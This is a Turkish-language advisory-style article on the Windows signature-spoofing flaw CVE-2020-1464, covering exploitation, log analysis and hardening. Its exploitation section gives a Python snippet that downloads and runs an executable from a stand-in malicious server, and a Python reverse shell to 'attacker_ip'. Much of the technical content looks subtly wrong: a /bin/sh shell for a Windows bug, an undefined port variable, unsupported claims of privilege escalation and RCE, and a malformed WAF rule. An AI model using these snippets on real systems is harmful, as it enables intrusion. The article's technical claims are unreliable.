CVE-2020-1464 · Bilgilendirme

Microsoft Windows Spoofing Vulnerability

CVE-2020-1464 zafiyeti sayesinde saldırganlar, yanlış imzalı dosyaları yükleyerek güvenlik önlemlerini atlabilir.

Üretici
Microsoft
Ürün
Windows
Seviye
yüksek
Yayın Tarihi
05 Nisan 2026
Okuma
9 dk okuma

CVE-2020-1464: Microsoft Windows Spoofing Vulnerability

Zorluk Seviyesi: Orta | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

CVE-2020-1464, Microsoft Windows işletim sistemlerinde bulunan önemli bir spoofing zafiyetidir. Bu zafiyet, Windows’un dosya imzalarını yanlış bir şekilde doğrulamasından kaynaklanmaktadır. Özellikle, bir saldırganın güvenlik özelliklerini atlayarak kötü niyetli olarak imzalanmamış dosyaları yüklemesine olanak tanır. Bu, saldırganların sistemde zararlı yazılımlar yüklemesi veya başka kötü niyetli eylemler gerçekleştirmesi için bir kapı açar. Zafiyet, 2020 yılında duyurulmuştur ve oldukça geniş bir etki alanına sahiptir.

Bu zafiyetin temelinde, Windows’un dosya imzalama algoritmasındaki bir hata yatmaktadır. Dosya imzalama mekanizması, dosyaların bütünlüğünü ve kaynağını doğrulamak için kullanılır. Ancak, bazı durumlarda, Windows’un dosya imzalarını doğrularken yürüttüğü kontroller yetersiz kalmaktadır. Örneğin, sahte bir imza oluşturulması durumunda, sistem bu imzayı tanıyabilir ve dosyayı güvenli olarak kabul edebilir. Böylece, kötü niyetli bir kullanıcı, kendi imzaladığı dosyaları kullanıcı sisteminde çalıştırabilir.

Gerçek dünya senaryolarında bu zafiyetin nasıl kullanılabileceğine dair çeşitli örnekler bulunmaktadır. Örneğin, bir saldırgan, bir yazılım güncellemesi olarak gösterilen kötü amaçlı bir dosya dağıtarak sisteminize sızabilir. Eğer bu güncelleme yanlış imzalanmışsa, sistem bunu düzgün bir güncelleme olarak algılayabilir. Bu tür bir senaryo, özellikle finans sektörü gibi yüksek güvenlik gerektiren alanlarda ciddi tehditler oluşturabilir. Bankalar ve finansal kurumlar, kullanıcı verilerinin gizliliği ve bütünlüğü için bu tür zafiyetlere karşı hassasiyet göstermelidir.

Dünya genelinde bu zafiyetten etkilenen birçok sektör bulunmaktadır. Özellikle bankacılık, sağlık, devlet kurumları gibi kritik alanlar, CVE-2020-1464'ten etkilenme riski taşımaktadır. Zira bu sektörlerde, sızma girişimleri sonucunda kullanıcı verilerinin ele geçirilmesi veya büyük maddi kayıplar yaşanması muhtemeldir. Aynı zamanda, üretim ve taşımacılık sektörleri de zararlı yazılımların devreye girmesi durumunda büyük riskler taşıyabilir.

Saldırganlar, bu zafiyeti kullanarak sistemlerde tam yetki elde edebilirler (Privilege Escalation). Sonuç olarak, antivirus ve güvenlik yazılımları bile bu tür kötü niyetli imzalı yazılımları belirlemede yetersiz kalabilir. Dolayısıyla, bu tür saldırılara karşı etkili bir savunma mekanizması geliştirmek kritik öneme sahiptir.

Hızla gelişen yazılım dünyasında, bu tür zafiyetlerin duyurulması ve hızlıca yamaların uygulanması son derece önemlidir. Microsoft bu zafiyeti tespit ettikten kısa bir süre sonra, ilgili güvenlik güncellemelerini yayımlamış ve kullanıcıların sistemlerini güncellemelerini önermiştir. Ancak, yine de kullanıcıların dikkatli olmaları ve imzalı olarak görünmeyen dosyaları yüklerken, kaynakları dikkatlice incelemeleri gerekmektedir.

Sonuç olarak, CVE-2020-1464’ün önemi, bilgisayar güvenliği açısından göz ardı edilemeyecek düzeyde olduğu kadar, sektörler arası iş birliği ve güvenlik bilinci oluşturma gerekliliğini de ön plana çıkarmaktadır. Bu tür zafiyetlere karşı hazırlıklı olmak ve sürekli güncel kalmak, günümüz dijital dünyasında hayati bir öneme sahiptir.

Teknik Sömürü (Exploitation) ve PoC

Microsoft Windows platformunda bulunan CVE-2020-1464, bir spoofing (sahtecilik) açığı olarak dikkat çekmektedir. Bu zafiyet, Windows'un dosya imzalarını yanlış bir şekilde doğrulamasından kaynaklanmakta ve kötü niyetli bir saldırganın güvenlik özelliklerini geçerek hatalı imzalı dosyaları yüklemesine olanak tanımaktadır. Bu durum, saldırganların hedef sistemde veri sızıntısı (data exfiltration), uzaktan kod çalıştırma (RCE) ve yetki atlatma (Auth Bypass) gibi kritik tehditler oluşturmasına neden olabilir.

Bu açığın istismar edilmesi için öncelikle bir hedef sistemi belirlememiz gerekiyor. Genellikle, işletim sisteminin güncel olmadığı veya kötü niyetli yazılımlar içeriyor olabileceği senaryolar tercih edilir. Aşağıda adım adım sömürü aşamalarını inceleyeceğiz.

İlk adım, açığın varlığını doğrulamak olacaktır. Bunun için, Windows sistemi üzerinden bir dosya imzasını kontrol etmemiz gerekecek. içerisinde %WINDIR%\System32 klasöründe bulunan bir uygulama veya DLL dosyası kullanmak mümkündür. Dosyanın imzasını kontrol etmek için aşağıdaki komutları kullanabiliriz:

signtool verify /pa "C:\Windows\System32\example.dll"

Eğer burada doğrulama hatası alıyorsanız, bu durum açık ile ilgili potansiyel bir zafiyeti işaret edebilir.

İkinci adımda, istismar edilecek dosyanın tespit edilmesi gerekmektedir. Bu, özellikle güvenlik güncellemeleri eksik olan sistemlerin hedeflenmesi için önemlidir. Aşağıda, bir örnek sahte imza dosyası oluşturma süreci verilmiştir:

  1. Yetkisiz bir uygulama veya DLL dosyası hazırlayın.
  2. Kötü niyetli dosyanın üzerine sahte bir imza ekleyin. Bir imza eklemek için signtool aracını veya benzeri bir yazılımı kullanabilirsiniz.
  3. Sistemde eksik olan güvenlik kontrolleri ve güncellemeleri sağlayarak, sahte imzalı dosyanızı hedef sistemde çalıştırmaya hazır hale getirin.

Üçüncü adımda, bu sahte imzalı dosyanın hedef sistemde nasıl çalıştırılacağına dair bir senaryo oluşturulmalıdır. Aşağıdaki Python kodu, bir HTTP isteği ile sahte imzalı dosyanın indirilmesi ve çalıştırılması üzerine örnek bir taslak sunmaktadır:

import requests
import os

# Kötü niyetli dosyanın URL'si
url = "http://malicious-server.com/fake-signed-file.exe"

# Dosyayı indir
response = requests.get(url)

# Dosyayı çalıştırılabilir kısımda sakla
with open("C:\\temp\\fake-signed-file.exe", "wb") as file:
    file.write(response.content)

# Dosyayı çalıştır
os.startfile("C:\\temp\\fake-signed-file.exe")

Burada yapılan, kötü niyetli bir sunucudan sahte imzalı dosyanın indirilmesi ve çalıştırılmasıdır. Bu tarz bir kod, eğer hedef sistemdeki güvenlik önlemleri bypass edilirse, saldırganın kötü amaçlı yazılımı çalıştırmasını sağlayabilir.

Dördüncü adım ise, zararlı yazılımın etkisini artırmak için bir geri dönüş (reverse shell) açmak olabilir. Bu süreçte, zararlı yazılımın kontrolünü sağlamak için aşağıdaki bağlantı açılışı kullanılabilir:

import socket
import subprocess

# Reverse shell için bağlantı
s = socket.socket()
s.connect(("attacker_ip", port))  # Saldırgan IP adresi ve port numarası
subprocess.call(["/bin/sh", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())

Bu noktada, hedef sistemdeki yetkileri elde ederek, sistem üzerinde daha fazla kontrol sağlanabilir. Ancak, etik sınırlar içerisinde kalmak ve bu tarz tekniklerin yalnızca kötü niyetli saldırıları önlemek için kullanılabileceğini hatırlamak önemlidir.

Sonuç olarak, CVE-2020-1464 zafiyetinin teknik detayları ve istismar yolları üzerinde durduğumuzda, sahte imza sistemlerinin zayıflıklarını anlayarak güvenliği artırma çabalarımızı da göz önünde bulundurmamız gerekmektedir. Kötü niyetli yazılımlara karşı çözüm geliştirmek, hem bireysel güvenlik hem de kurumsal güvenlik açısından kritik bir öneme sahiptir.

Forensics (Adli Bilişim) ve Log Analizi

CVE-2020-1464, Microsoft Windows işletim sistemindeki bir spoofing (sahtecilik) güvenlik açığıdır. Bu zafiyet, Windows’un dosya imzalarını yanlış bir şekilde doğrulaması sonucu oluşur ve kötü niyetli bir saldırganın güvenlik özelliklerini aşarak yanlış imzalı dosyaları yüklemesine olanak tanır. Bu durum, bir siber güvenlik uzmanı açısından ciddi tehditler doğurabilir. Bu yazıda, siber güvenlik uzmanlarının bu tür bir saldırıyı tespit etmek için log dosyalarını (kayıt dosyalarını) nasıl analiz etmeleri gerektiğini ve belirli imzalara (signature) nasıl dikkat etmeleri gerektiğine odaklanacağız.

Bir siber güvenlik uzmanı, öncelikle güvenlik açığının etkilediği sistemlerde detaylı log analizi yapmalıdır. SIEM (Security Information and Event Management) sistemleri, bu tür analizler için kritik bir rol oynar. Log dosyaları, olayları takip etmek ve potansiyel tehditleri belirlemek için önemli bilgiler içerir. Özellikle Access log (erişim kaydı) ve error log (hata kaydı) dosyaları, şüpheli etkinlikleri izlemek için kullanışlıdır.

Bu tür bir saldırının tespit edilmesi için dikkat edilmesi gereken bazı temel imzalar ve noktalar vardır:

  1. Dosya İmzaları ve Yüklemeleri: Kötü niyetli bir kullanıcı, yanlış imzalı dosyaları yüklemek için mevcut imzalanmış dosyaların yerini doldurabilir. Dolayısıyla, sistemdeki dosya imzalarının doğruluğunu kontrol etmek önemlidir. Windows’un imzaları doğru bir şekilde doğrulayıp doğrulamadığını izlemek için açılan her bir dosyanın imza kontrol sonuçlarına bakılmalıdır.

  2. Şüpheli İstemcilerin ve IP'lerin Tespiti: Access log üzerinde, normalde olmayan IP adreslerinden veya kullanıcı isimlerinden gelen dosya yükleme talepleri araştırılmalıdır. Özellikle bilindik kaynaklardan olmayan imzalı dosyaların yüklenmesi, bir saldırının göstergesi olabilir.

2023-10-01 12:15:23 INFO User: john.doe | Action: File Upload | Source IP: 192.168.1.105 | File: malicious_file.exe

Bu gibi kayıtlar, saldırganların sisteme izinsiz dosyalar yüklemeye çalıştıklarını gösterir.

  1. Hata Kayıtları ve Anormal Durumlar: Error log, dosyaların hatalı yüklemelerine dair bilgileri içerir. Sahtecilik girişiminde bulunan dosyalar, yükleme sırasında çeşitli hatalara yol açabilir. Örneğin, dosya imzasında bir tutarsızlık olduğunda ortaya çıkabilecek hata mesajları analitik için önemlidir.
2023-10-01 12:16:00 ERROR File Upload Failed | User: john.doe | Error: Invalid Signature

  1. Sık Kullanılan Dosya Türleri: Genellikle, kötü niyetli yazılımlar .exe, .dll, veya .sys gibi uzantılara sahip olabilir. Bu uzantılar için yapılacak analizler, şüpheli dosyaların tespit edilmesi açısından kritik öneme sahiptir. Anormal dosya yükleme davranışları gözlemlendiğinde, bu tür dosyaların güvenilirliğini sorgulamak gerekebilir.

  2. Davranışsal Analiz: Kullanıcı davranışlarını izlemek de önemlidir. Normal kullanıcı aktivitelerinde ani ve beklenmedik değişiklikler, olası bir güvenlik açığını işaret edebilir. Örneğin, bir kullanıcının daha önce yüklemediği bir dosya türünü yüklemeye çalışması dikkatle izlenmelidir.

Son olarak, log analizi yaparken dikkat edilen bu unsurlar, CVE-2020-1464 gibi zafiyetlerin etkilerini azaltmak ve etkin bir şekilde müdahale etmek için kritik öneme sahiptir. Herhangi bir şüpheli etkinlik tespit edildiğinde, derhal uygun önlemler alınmalı ve kullanıcılar bilgilendirilmelidir. Bu sayede, sahtecilik (spoofing) girişimlerine karşı etkili bir koruma sağlanmış olur.

Savunma ve Sıkılaştırma (Hardening)

CVE-2020-1464, Microsoft Windows işletim sistemlerindeki ciddi bir spoofing (sahtekarlık) zafiyetidir. Bu zafiyet, Windows'un dosya imzalarını yanlış bir şekilde doğrulaması sonucunda ortaya çıkmakta ve kötü niyetli bir saldırganın güvenlik özelliklerini aşarak yanlış şekilde imzalanmış dosyaları çalıştırmasına olanak tanımaktadır. Özellikle bu tür bir zafiyetle karşılaşan bir sistem, yetkisiz kullanıcıların kötü amaçlı yazılımları veya zararlı kodları çalıştırmasına sebep olabilir.

Zafiyetin istismar edilmesi durumunda, saldırganın sistemi etkisiz hale getirme veya özellikle hedef alınan verilere erişim sağlama (RCE - Uzak Kod Yürütme) olasılığı bulunmaktadır. Dolayısıyla, saldırganın, güvenlik stratejilerini aşmayı başarması, sistemin güvenliğini tehlikeye atabilir.

CVE-2020-1464'e karşı korunmanın en etkili yollarından biri, mevcut Windows güncellemelerinin ve yamanın uygulanmasıdır. Microsoft, bu tür zafiyetlere karşı önlem almak için sürekli güncellemeler yayınlamaktadır. Sistem yöneticileri, "Windows Update" mekanizmasını etkinleştirerek, bu güncellemelerin otomatik olarak alınmasını sağlamak için gerekli ayarlamaları yapmalıdır. Bu, sistemin kritik güncellemeleri ve yamaları almasını güvence altına alır.

Ayrıca, ağ güvenliğini artırmak amacıyla web uygulama güvenlik duvarları (WAF) kurallarının uygulanması gereklidir. Örneğin, belirli dosya uzantıları veya imza doğrulama sürecinde anormal davranışları tespit eden özel WAF kuralları oluşturulmalıdır. Aşağıda, bu tür bir WAF kuralının örneği verilmiştir:

SecRule FILES:EXTENSIONS "@streq evilfile.exe" "id:12345,phase:2,deny,status:403,msg:'Kötü niyetli dosya yüklenmeye çalışıldı.'"

Bu örnekte, tehlikeli bir uzantıya sahip dosyaların yüklenmeye çalışıldığında sistemin bunu engellemesi sağlanmaktadır.

Kalıcı sıkılaştırma konusunda da aşağıdaki öneriler dikkate alınmalıdır:

  1. Güvenli İmzalama Kullanımı: Yazılımların yalnızca güvenilir kaynaklardan geldiğini doğrulamak için güvenli imzalama sertifikaları kullanılmalıdır. Sertifikaların geçerliliği düzenli olarak kontrol edilmelidir.

  2. Erişim Kontrolü: Windows tabanlı sistemlerde, kullanıcıların ve grupların erişim haklarının sıkı bir şekilde yönetilmesi gereklidir. Yetkisiz erişimi önlemek için en az yetki ilkesine (Principle of Least Privilege) uyulmalıdır.

  3. Kötü Amaçlı Yazılım Taraması: Sistemlerde düzenli olarak kötü amaçlı yazılım taramaları yapılmalıdır. Bu, potansiyel tehditlerin tespit edilmesini ve ortadan kaldırılmasını sağlayacaktır.

  4. Olay Günlüğü Tutma: Sistem olaylarının günlüklenmesi ve düzenli olarak izlenmesi, şüpheli etkinliklerin tespit edilmesine yardımcı olur. Bu, saldırganların kötü niyetli faaliyetlerini erken aşamada algılamak için kritik öneme sahiptir.

Sonuç olarak, CVE-2020-1464 gibi zafiyetler, doğru güvenlik önlemleri ve sıkılaştırma teknikleri ile yönetilmelidir. Sistem yöneticilerinin güncellemeleri uygulaması, ağ güvenliği önlemlerini artırması ve kötü niyetli yazılımlara karşı sürekli bir gözlem içinde olması, bu tür zafiyetlerin istismarını büyük ölçüde azaltacaktır.